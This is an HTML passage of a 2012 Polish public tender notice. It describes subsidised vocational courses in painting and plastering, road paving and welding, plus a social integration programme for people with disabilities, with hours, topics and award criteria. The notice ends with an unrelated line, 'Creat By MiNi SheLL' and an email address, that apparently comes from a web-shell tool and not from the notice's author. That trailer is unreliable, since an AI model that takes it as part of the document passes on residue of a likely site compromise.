Ilość godzin - łącznie 150, w tym: teoria - 50 godzin, praktyka - 100 godzin,
Tematyka:
- bezpieczeństwo i higiena pracy,
- materiałoznawstwo,
- technologia,
- organizacja stanowiska pracy,
- przechowywanie farb,
- odpady i ochrona środowiska,
- prace malarskie,
- prace tapeciarskie,
- wykonywanie tynków zewnętrznych i wewnętrznych,
- wykonywanie okładzin ściennych,
- wykonanie izolacji,
- przygotowanie podłoża,
- przygotowanie farb i materiałów do prac malarskich,
- malowanie techniką emulsyjna,
- malowanie techniką olejną.
Inne działania:
- dojazd uczestników kursu do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
zaświadczenie wydane na druku Ministerstwa Edukacji Narodowej
dwa dyplomy - w języku polskim i angielskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Brukarz - monter nawierzchni drogowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie wezmą udział 3 osoby
Termin realizacji:  wrzesień - październik 2012 r.
Ilość godzin  ogółem 250, w tym : teoria - 70 godz., praktyka - 180 godz.
Tematyka:
- podstawy wiedzy o robotach drogowych  
- teoretyczne podstawy zasadniczych technologii robót brukarskich  
- ogólne warunki techniczne wykonywania robót brukarskich  
- rysunek zawodowy  
- wykonawstwo robót drogowych z różnych materiałów  
- przygotowanie do wykonania i remontów nawierzchni chodników, ulic, placów z kamieni i kostek oraz płyt - przygotowanie do brukowania powierzchni skarp,  
- zasady przygotowania do pracy urządzeń i podstawowego sprzętu , 
- obsługa i konserwacja urządzeń i podstawowego sprzętu ,
- zasady organizacji pracy na stanowisku roboczym,  
- ogólne wymagania BHP.
Inne działania:
- dojazd uczestników kursu do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
zaświadczenie wydane na druku Ministerstwa Edukacji Narodowej
dwa dyplomy - w języku polskim i angielskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Spawanie elektrodami otulonymi blach i rur - spoiny pachwinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie weźmie udział 5 osób
Ilość godzin łącznie 171,  w tym  teoria - 70 godzin, praktyka - 101 godzin,
Termin realizacji: sierpień-październik 2012 r
Tematyka:
- procesy spawania,
- materiały spawalnicze,
-urządzenia do spawania,
- technologie i techniki spawania,
- przygotowanie materiału do spawania,
zasady szkolenia i egzaminowania spawaczy według wytycznych Instytutu Spawalnictwa w Gliwicach       W-07/IS-17 oraz EN 287-1:2007 i EN ISO 5817:2007,
- przepisy bhp i przeciwpożarowe,
- zapewnienie jakości w spawalnictwie,
- instruktaż wstępny, 
- szkolenie praktyczne.
Inne działania:
- dojazd uczestników kursu do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
zaświadczenie wydane na druku Ministerstwa Edukacji Narodowej
dwa dyplomy - w języku polskim i angielskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Skierowanie do Klubu Integracji Społecznej w ramach PAL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W  Programie Aktywności Lokalnej weźmie udział 8 osób: osoby niepełnosprawne i członkowie rodzin,         w których funkcjonują osoby niepełnosprawne
Ilość godzin:  64 godziny + jednodniowa wycieczka integracyjna
 Zakres:
-  poradnictwo psychologiczne - 12 godzin, termin realizacji: maj 2012 r.
-  doradztwo zawodowe - 8 godz, termin realizacji: czerwiec 2012 r.
-  warsztat wspierający - motywacyjny - 12 godzin, termin realizacji: lipiec 2012 r.
-  zajęcia komputerowe - 8 godzin, termin realizacji: sierpień 2012 r.
-  trening gospodarowania - 8 godzin, termin realizacji: wrzesień 2012 r.
-  edukacja zdrowotna - 16 godzin, termin realizacji: październik 2012 r. 
- jednodniowa wycieczka integracyjna  do Biskupina (wszystkie koszty ponosi wykonawca, tj. transport,    bilety wstępu, itp.),  ilość osób - maksymalnie 35.
Inne działania:
- ubezpieczenie uczestników zajęć,
- catering dla uczestników zajęć (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
zaświadczenie  ukończenia zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com